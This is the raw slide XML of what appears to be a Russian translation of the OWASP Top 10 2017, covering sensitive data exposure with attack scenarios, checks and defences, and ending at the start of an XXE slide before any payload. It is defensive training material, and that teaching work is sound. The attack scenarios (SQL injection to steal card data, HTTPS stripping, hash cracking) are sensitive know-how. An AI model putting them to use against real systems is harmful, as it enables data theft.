Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/danielmiessler/SecLists/tree/master/Passwords" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide8.xm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Credential_Stuffing_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/384.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287.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Authentication_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/danielmiessler/SecLists" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pages.nist.gov/800-63-3/sp800-63b.html#memsecret" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_authentication"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Testing_Identity_Management" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Automated_Threats_to_Web_Appl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sz="3600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Топ-10 OWASP - 2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Десять самых критичных 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№1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="720" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Приложение шифрует номера кредитных карт в базе данных, используя автоматическое шифрование БД. Однако эти данные автоматически расшифровываются при извлечении, позволяя с помощью внедрения SQL-кода получить данные кредитных карт в незашифрованном виде. </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№2:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="720" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Сайт не использует TLS для всех страниц или поддерживает ненадежное шифрование. Злоумышленник может просмотреть сетевой трафик (например, в небезопасной беспроводной сети), переключить соединение с HTTPS на HTTP, перехватить запросы и похитить сессионные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После этого он может использовать полученные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для перехвата сессии пользователя (прошедшего аутентификацию), изменив личные данные пользователя. Также злоумышленник может изменить все передаваемые данные , например, получателя денежного перевода.</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№3:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="720" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Для сохранения паролей в базе данных не используется соль или используется простой алгоритм хеширования. Уязвимость в загрузке файлов позволяет злоумышленнику получить БД паролей. Все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без соли могут быть восстановлены с помощью радужной таблицы предварительно </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="720" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>рас</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="720" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>с</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="720" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>читанных </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="720" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>хешей</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="720" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.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рассчитанные с использованием простых или быстрых хеш-функций, могут быть взломаны с помощью графических процессоров, даже если для них использовалась соль.</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Прежде всего необходимо определить требуемый уровень защиты данных при их передаче и хранении. Например, пароли, номера кредитных карт, медицинские записи, персональные данные и коммерческие тайны требуют дополнительной защиты, особенно если они подпадают под действие закона о неприкосновенности данных (напр., Общего регламента ЕС по защите </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>данных</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (GDPR)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0" smtClean="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rPr>
              <a:t>или закона о защите финансовых данных (напр., Стандарта безопасности данных в сфере платежных карт (PCI DSS)).</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Шифруются ли передаваемые данные? Это касается протоколов передачи данных, таких как HTTP, SMTP и FTP. Особенно опасен внешний интернет-трафик. Проверьте весь внутренний трафик, например, между </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="7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балансировщиками</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нагрузки, веб-серверами и внутренними системами.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Шифруются ли хранилища критичных данных, а также резервные копии?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по умолчанию или в более ранних версиях устаревшие или ненадежные алгоритмы шифрования? </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созданные по умолчанию, ненадежные или одинаковые </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>шифроключи</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, а также применяются ли соответствующие механизмы контроля и смены ключей?</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Используется ли шифрование, например, присутствуют ли директивы безопасности пользовательских агентов (браузеров) и заголовки?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Проверяет ли пользовательский агент (напр., приложение или почтовый клиент) действительность полученных сертификатов?</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См. Стандарт подтверждения безопасности приложений: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Криптография (V7)</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5"/>
              </a:rPr>
              <a:t>Защита данных (V9)</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9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700" u="sng"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700" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t> защита OWASP: Защита данных</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Стандарт подтверждения безопасности приложений OWASP (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>V7</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5"/>
              </a:rPr>
              <a:t>9</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6"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="7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8"/>
              </a:rPr>
              <a:t>Памятка OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>Защита транспортного уровня</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9"/>
              </a:rPr>
              <a:t>Памятка OWASP: Защита конфиденциальности пользователей</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0"/>
              </a:rPr>
              <a:t>Памятка OWASP: Хранение паролей</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11"/>
              </a:rPr>
              <a:t>хранение в зашифрованном виде</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hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>Проект OWASP: Безопасные заголовки</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13"/>
              </a:rPr>
              <a:t>Памятка по HSTS</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4"/>
              </a:rPr>
              <a:t>Руководство OWASP по тестированию: Проверка надежности шифрования</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Сторонние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5"/>
              </a:rPr>
              <a:t>CWE-202: Разглашение конфиденциальных данных, связанное с запросами</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="600" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>CWE-310: Уязвимости, связанные с криптографией</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="600" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>CWE-311: Отсутствие шифрования</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7"/>
              </a:rPr>
              <a:t>CWE-312: Хранение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8"/>
              </a:rPr>
              <a:t>CWE-319: Передача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9"/>
              </a:rPr>
              <a:t>CWE-326: Ненадежное шифрование</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="650" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="650" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>CWE-327: Скомпрометированный </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="650" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>криптоалгоритм</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="650" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId19"/>
            </a:endParaRP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20"/>
              </a:rPr>
              <a:t>CWE-359: Разглашение личных данных (Нарушение конфиденциальности)</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Выполните, как минимум, следующее, а также ознакомьтесь с материалами в разделе "Ссылки":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Классифицируйте данные, обрабатываемые, хранимые или передаваемые приложением. Определите какие из них являются конфиденциальными согласно законам о неприкосновенности данных, нормативам или бизнес-требованиям.</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Реализуйте требования согласно классификации.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Не храните конфиденциальные данные без необходимости. Сразу удаляйте их или используйте </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>токенизацию</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> или усечение, соответствующие стандарту PCI DSS. Данные, которые не сохраняются, нельзя украсть.</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шифрование всех хранимых конфиденциальных данных.</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применение современных и надежных алгоритмов, протоколов и ключей, а также используйте соответствующие механизмы управления ключами.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Шифруйте все передаваемые данные с помощью надежного протокола, например, TLS с совершенной прямой секретностью (PFS), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>приоритизацией</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> шифров сервером и безопасными настройками. Обеспечьте принудительное шифрование, например, используя механизм принудительного использования HTTPS (HSTS).</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Отключите кэширование ответов, содержащих конфиденциальные данные.</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Сохраняйте пароли с помощью надежных, адаптивных функций хеширования с солью и фактором трудоемкости (задержки), таких как </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId21"/>
              </a:rPr>
              <a:t>Argon2</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2"/>
              </a:rPr>
              <a:t>scrypt</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3"/>
              </a:rPr>
              <a:t>bcrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> или </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId24"/>
              </a:rPr>
              <a:t>PBKDF2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</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Проверяйте отдельно эффективность конфигурации и настройки.</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A3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="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Разглашение конфиденциальных </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>данных</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2642218986"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8620" y="957600"/>
          <a:ext cx="6838580" cy="2210640"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="101018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Распространенность: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1100" b="1" i="0" u="none" strike="noStrike"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00" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Вместо взлома механизмов шифрования злоумышленники крадут ключи, проводят атаки по принципу "человек посередине" или получают данные в незашифрованном виде с сервера, в процессе их передачи или из клиента пользователя, например, браузера. Подобные атаки обычно проводятся вручную. Ранее полученные базы данных паролей могут быть взломаны методом подбора с использованием графических процессоров.</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atin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>На протяжении последних лет данная атака является самой распространенной и опасной. Чаще всего встречается отсутствие шифрования конфиденциальных </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="770" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>данных, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="770" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>а при наличии </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="770" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>часто </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="770" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>используются ненадежные алгоритмы, протоколы, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="770" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>шифры, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="770" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>методы хранения хешированных паролей или методы создания и управления ключами. Также легко обнаружить уязвимости на стороне сервера для передаваемых данных, но не хранимых.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800" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Из-за уязвимости часто страдают все персональные данные (медицинские записи, учетные данные, данные кредитных карт), которые должны быть защищены по закону, например, в соответствии с Общим регламентом ЕС по защите данных (GDPR) или локальными законами о неприкосновенности данных.</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5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="21280" y="1506544"/>
            <a:ext cx="990600" cy="390525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId26"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5855880" y="1506543"/>
            <a:ext cx="990600" cy="390525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId27"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5499230" y="1157492"/>
            <a:ext cx="628650" cy="190500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId28"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-26345" y="1056207"/>
            <a:ext cx="542925" cy="276225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId29"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3101250" y="1056207"/>
            <a:ext cx="723900" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId30"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1180265" y="1027632"/>
            <a:ext cx="628650" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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endParaRPr lang="ru-RU" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Было зафиксировано большое количество XXE-атак, включая атаки на встроенные устройства. XXE обнаруживаются в самых неожиданных местах, включая глубоко вложенные зависимости. Самым простым способом реализации атаки является загрузка (если поддерживается) вредоносного XML-файла:</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Злоумышленник пытается получить данные с сервера:</a:t>
